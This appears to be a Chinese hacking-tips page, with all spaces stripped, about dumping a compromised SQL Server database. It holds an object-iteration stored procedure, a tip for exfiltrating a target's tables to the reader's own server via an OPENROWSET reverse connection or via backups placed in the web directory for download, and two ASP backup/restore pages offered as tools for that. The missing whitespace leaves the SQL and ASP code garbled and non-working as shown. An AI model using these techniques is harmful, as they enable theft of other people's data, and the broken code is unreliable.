/*Thisprocreturnsoneormorerowsforeachtable(optionally,matching@where),witheachtabledefaultingtoits
ownresultset*/
/*@precommandand@postcommandmaybeusedtoforceasingleresultsetviaatemptable.*/
/*Preprocessorwon'treplacewithinquotessohavetousestr().*/
declare@mscatnvarchar(12)
select@mscat=ltrim(str(convert(int,0x0002)))
if(@precommandisnotnull)
exec(@precommand)
/*Defined@isobjectforsaveobjecttype*/
Declare@isobjectvarchar(256)
select@isobject=case@objectTypewhen1then'IsUserTable'
when2then'IsView'
when3then'IsTrigger'
when4then'IsProcedure'
when5then'IsDefault'
when6then'IsForeignKey'
when7then'IsScalarFunction'
when8then'IsInlineFunction'
when9then'IsPrimaryKey'
when10then'IsExtendedProc'
when11then'IsReplProc'
when12then'IsRule'
end
/*createtheselect*/
/*Use@isobjectvariableissteadofIsUserTablestring*/
EXEC(N'declarehCForEachcursorglobalforselect''[''+REPLACE(user_name(uid),N'']'',N'']]'')+'']''+''.''+''[''+
REPLACE(object_name(id),N'']'',N'']]'')+'']''fromdbo.sysobjectso'
+N'whereOBJECTPROPERTY(o.id,N'''+@isobject+''')=1'+N'ando.category&'+@mscat+N'=0'
+@whereand)
declare@retvalint
select@retval=@@error
if(@retval=0)
exec@retval=sp_MSforeach_worker@command1,@replacechar,@command2,@command3
if(@retval=0and@postcommandisnotnull)
exec(@postcommand)
return@retval
GO


/*
1。获得所有的存储过程的脚本:
EXEcsp_MSforeachObject@command1="sp_helptext'?'",@objectType=4
2。获得所有的视图的脚本:
EXEcsp_MSforeachObject@command1="sp_helptext'?'",@objectType=2

EXEcsp_MSforeachObject@command1="sp_changeobjectowner'?','dbo'",@objectType=1
EXEcsp_MSforeachObject@command1="sp_changeobjectowner'?','dbo'",@objectType=2
EXEcsp_MSforeachObject@command1="sp_changeobjectowner'?','dbo'",@objectType=3
EXEcsp_MSforeachObject@command1="sp_changeobjectowner'?','dbo'",@objectType=4
*/

33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库,在查询分析那里执行
insertintoOPENROWSET('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;','select*from你建立的表)select*from对方的表—
要是数据量太大的话就看看他数据库里有没有自动编号的字段.select*from表名whereid>100
这样来弄吧
要是和WEB同台的话,直接将库BAK到WEB目录下回来就OK啦。。。不过前提库不能太大,超过2G的话SQL就超时了
如果是SA权限可以利用下面的两个ASP程序来备份数据库:

sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQLServer数据库的备份与恢复</TITLE>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
</HEAD>
<BODY>
<formmethod="post"name=myform>
选择操作:<INPUTTYPE="radio"NAME="act"id="act_backup"value="backup"><labelfor=act_backup>备份</label> 
<INPUTTYPE="radio"NAME="act"id="act_restore"value="restore"><labelfor=act_restore>恢复</label>
<br>数据库名:<INPUTTYPE="text"NAME="databasename"value="<%=request("databasename")%>">
<br>文件路径:<INPUTTYPE="text"NAME="bak_file"value="c:/1.exe">(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..)<br>
<inputtype="submit"value="确定">
</form>
<%
dimsqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver="localhost"'sql服务器
sqlname="sa"'用户名
sqlpassword="数据库密码"'密码
sqlLoginTimeout=15'登陆超时
databasename=trim(request("databasename"))
bak_file=trim(request("bak_file"))
bak_file=replace(bak_file,"$1",databasename)
act=lcase(request("act"))
ifdatabasename=""then
response.write"inputdatabasename"
else
ifact="backup"then
Setsrv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout=sqlLoginTimeout
srv.Connectsqlserver,sqlname,sqlpassword
Setbak=Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackupsrv
iferr.number>0then
response.writeerr.number&"<fontcolor=red><br>"
response.writeerr.description&"</font>"
endif
Response.write"<fontcolor=green>备份成功!</font>"
elseifact="restore"then
'恢复时要在没有使用数据库时进行!
Setsrv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout=sqlLoginTimeout
srv.Connectsqlserver,sqlname,sqlpassword
Setrest=Server.createObject("SQLDMO.Restore")
rest.Action=0'fulldbrestore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True'Forcerestoreoverexistingdatabase
iferr.number>0then
response.writeerr.number&"<fontcolor=red><br>"
response.writeerr.description&"</font>"
endif
rest.SQLRestoresrv

Response.write"<fontcolor=green>恢复成功!</font>"
else
Response.write"<fontcolor=red>没有选择操作</font>"
endif
endif
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT"CODEPAGE="936"%>
<!DOCTYPEhtmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<htmlxmlns="http://www.w3.org/1999/xhtml">
<head>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312"/>
<title>采飞扬ASP备份MSSQL数据库程序V1.0--QQ:79998575</title>
</head>
<style>
BODY{FONT-SIZE:9pt;COLOR:#000000;FONT-FAMILY:"CourierNew";scrollbar-face-color:#E4E4F3;scrollbar-highlight-color:#FFFFFF;scrollbar-3dlight-color:#E4E4F3;scrollbar-darkshadow-color:#9C9CD3;scrollbar-shadow-color:#E4E4F3;scrollbar-arrow-color:#4444B3;scrollbar-track-color:#EFEFEF;}TABLE{FONT-SIZE:9pt;FONT-FAMILY:"CourierNew";BORDER-COLLAPSE:collapse;border-top-width:1px;border-right-width:1px;border-bottom-width:1px;border-left-width:1px;border-top-style:solid;border-right-style:none;border-bottom-style:none;border-left-style:solid;border-top-color:#d8d8f0;border-right-color:#d8d8f0;border-bottom-color:#d8d8f0;border-left-color:#d8d8f0;}.tr{font-family:"CourierNew";font-size:9pt;background-color:#e4e4f3;text-align:center;}.td{font-family:"CourierNew";font-size:9pt;background-color:#f9f9fd;}.warningColor{font-family:"CourierNew";font-size:9pt;color:#ff0000;}input{
font-family:"CourierNew";
BORDER-TOP-WIDTH:1px;
BORDER-LEFT-WIDTH:1px;
FONT-SIZE:12px;
BORDER-BOTTOM-WIDTH:1px;
BORDER-RIGHT-WIDTH:1px;
color:#000000;
}textarea{font-family:"CourierNew";BORDER-TOP-WIDTH:1px;BORDER-LEFT-WIDTH:1px;FONT-SIZE:12px;BORDER-BOTTOM-WIDTH:1px;BORDER-RIGHT-WIDTH:1px;color:#000000;}.liuyes{
background-color:#CCCCFF;
}
A:link{FONT-SIZE:9pt;COLOR:#000000;FONT-FAMILY:"CourierNew";TEXT-DECORATION:none;}tr{font-family:"CourierNew";font-size:9pt;line-height:18px;}td{font-family:"CourierNew";font-size:9pt;border-top-width:1px;border-right-width:1px;border-bottom-width:1px;border-left-width:1px;border-top-style:none;border-right-style:solid;border-bottom-style:solid;border-left-style:none;border-top-color:#d8d8f0;border-right-color:#d8d8f0;border-bottom-color:#d8d8f0;border-left-color:#d8d8f0;}.trHead{font-family:"CourierNew";font-size:9pt;background-color:#e4e4f3;line-height:3px;}.inputLogin{font-family:"CourierNew";font-size:9pt;border:1pxsolid#d8d8f0;background-color:#f9f9fd;vertical-align:bottom;}</style>
<body>
<formmethod="post"name="myform"action="?action=backupdatabase">
<tablewidth="686"border="1"align="center">
<tr>
<tdwidth="613"height="30"align="center"bgcolor="#330066"><fontcolor="#FFFFFF">采飞扬ASP备份MSSQL数据库程序V1.0</font></td>
</tr>
<tr>
<td>选择操作:
<inputtype="radio"name="act"id="act_backup"value="backup"/>
<labelfor=act_backup>备份</label>
<inputtype="radio"name="act"id="act_restore"value="restore"/>
<labelfor=act_restore>恢复</label></td>
</tr>
<tr>
<td><label>SQL服务器:
<inputtype="text"name="sqlserver"value="localhost"/>
</label></td>
</tr>
<tr>
<td><label>用户名:
<inputname="sqlname"type="text"value="sa"/>
密码:
<inputtype="text"name="sqlpassword"/>
</label></td>
</tr>
<tr>
<td><label>数据库名:
<inputtype="text"name="databasename"value="<%=request("databasename")%>"/>
</label></td>
</tr>
<tr>
<td>文件路径:
<inputname="bak_file"type="text"value="<%=server.MapPath("/")&"/"&"liuyes.bak"%>"size="60"/>
(备份或恢复的文件路径)</td>
</tr>
<tr>
<td><%Response.write"本文件绝对路径:"%>
<fontcolor="#FF0000">
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
</font></td>
</tr>
<tr>
<td><inputname=submit1type="submit"class="liuyes"id=submit1size="10"value="确定"/>
<inputname="Submit"type="reset"class="liuyes"size="10"value="重置"/></td>
</tr>
</table>
</form>
<tablewidth="686"border="1"align="center">
<tr>
<td>提示信息:<%
ifrequest("action")=""then
response.write"<fontcolor=#ff0000>不用我多说什么了吧!</font>"
endif
'SQLServer数据库的备份与恢复!
ifrequest("action")="backupdatabase"Then
dimsqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver=trim(request("sqlserver"))
sqlname=trim(request("sqlname"))
sqlpassword=trim(request("sqlpassword"))
sqlLoginTimeout=15
databasename=trim(request("databasename"))
bak_file=trim(request("bak_file"))
bak_file=replace(bak_file,"$1",databasename)
act=lcase(request("act"))
ifdatabasename=""then
response.write"<fontcolor=#ff0000>没有输入数据库名称!</font>"
else
ifact="backup"then
Setsrv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout=sqlLoginTimeout
srv.Connectsqlserver,sqlname,sqlpassword
Setbak=Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action=0
bak.Initialize=1
'bak.Replace=True
bak.Files=bak_file
bak.SQLBackupsrv
iferr.number>0then
response.writeerr.number&"<fontcolor=red><br>"
response.writeerr.description&"</font>"
endif
Response.write"<fontcolor=green>备份成功!</font>"
elseifact="restore"then
'恢复时要在没有使用数据库时进行!
Setsrv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout=sqlLoginTimeout
srv.Connectsqlserver,sqlname,sqlpassword
Setrest=Server.createObject("SQLDMO.Restore")
rest.Action=0'fulldbrestore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True'Forcerestoreoverexistingdatabase
iferr.number>0then
response.writeerr.number&"<fontcolor=red><br>"
response.writeerr.description&"</font>"
endif
rest.SQLRestoresrv
Response.write"<fontcolor=green>恢复成功!</font>"
else
Response.write"<fontcolor=red>请选择备份或恢复!</font>"
endif
endif
endif
%></td>
</tr>
</table>
</body>
</html>

分享到:
评论

相关推荐

    Web攻防系列教程之浅析PHP命令注入攻击

    Web攻防系列教程之浅析PHP命令注入攻击

    Sql注入攻击技术实战

    sql注入一般针对基于web平台的应用程序 由于...就形成了sql注入漏洞,时至今日任然有很大一部分网站存在sql注入漏洞,可想而知sql注入攻击的危害,下面就目前sql注入攻击技术进行总结,让我们更加了解这种攻击与防御方法

    SQL注入攻击与防御(安全技术经典译丛)

    本书包含所有与SQL注入攻击相关的、当前已知的信息,凝聚了由本书作者组成的、无私奉献的SQL注入专家团队的所有深刻见解。  什么是SQL注入?理解它是什么以及它的基本原理  查找、确认和自动发现SQL注入  查找代码...

    注入攻击大纲

    注入攻击大纲,如何寻找注入,获取后台,等一系列详细流程。

    深入分析SQL注入攻击及安全防范

    SQL 注入 攻击 安全防范 SQL注入攻击通常发生在攻击者对一些数据库应用程序的合法SQL命令语句中加入一些额外非法 的SQL 命令而达到改变数据的输入最终实现对应用程序甚至系统攻击的目的。

    SQL注入攻击与防御

    本书包含所有与SQL注入攻击相关的、当前已知的信息,凝聚了由本书作者组成的、无私奉献的SQL注入专家团队的所有深刻见解。  什么是SQL注入?理解它是什么以及它的基本原理  查找、确认和自动发现SQL注入  查找代码...

    论文研究-一种有效的CiscoIOS映像注入攻击分析方法.pdf

    针对Cisco IOS映像注入攻击提出了一种基于虚拟化的恶意代码分析方法。通过虚拟化技术的研究, 设计实现了虚拟化分析平台CDAP(Cisco dynamic analysis platform), 为IOS系统提供了运行环境, 在此基础上, 采用指令信息...

    详解php命令注入攻击

    命令注入攻击 命令注入攻击(Command Injection),是指黑客通过利用HTML代码输入机制缺陷(例如缺乏有效验证限制的表格域)来改变网页的动态生成的内容。从而可以使用系统命令操作,实现使用远程数据来构造要执行的...

    Oracle开发人员SQL注入攻击入门

    Oracle开发人员SQL注入攻击入门教程 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令

    初探PHP的SQL注入攻击的技术实现以及预防措施

    有部份人认为SQL注入攻击是只针对MicrosoftSQLServer而来,但只要是支持批处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。在应用程序中若有下列状况,则可能应用程序正暴露在SQLInjection的高风险情况下:...

    六个建议防止SQL注入式攻击

    SQL注入式攻击的主要形式有两种。一是直接将代码插入到与SQL命令串联在一起并使得其以执行的用户输入变量。上面笔者举的例子就是采用了这种方法。由于其直接与SQL语句捆绑,故也被称为直接注入式攻击法。二是一种...

    SQL注入技巧2-常用技巧总结(攻击向量)

    个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧

    Kali_Linux_中间人站攻击.pdf

    并顺利执行,则相当于黑客直接拿到了Webshell 4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击...

    ASP.NET中如何防范SQL注入式攻击

     所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入...

    PHP防止注入攻击实例分析

    本文以实例形式详细分析了PHP防止注入攻击的方法。分享给大家供大家参考。具体分析如下: PHP addslashes() 函数–单撇号加斜线转义 PHP String 函数 定义和用法 addslashes() 函数在指定的预定义字符前添加反斜杠。...

Global site tag (gtag.js) - Google Analytics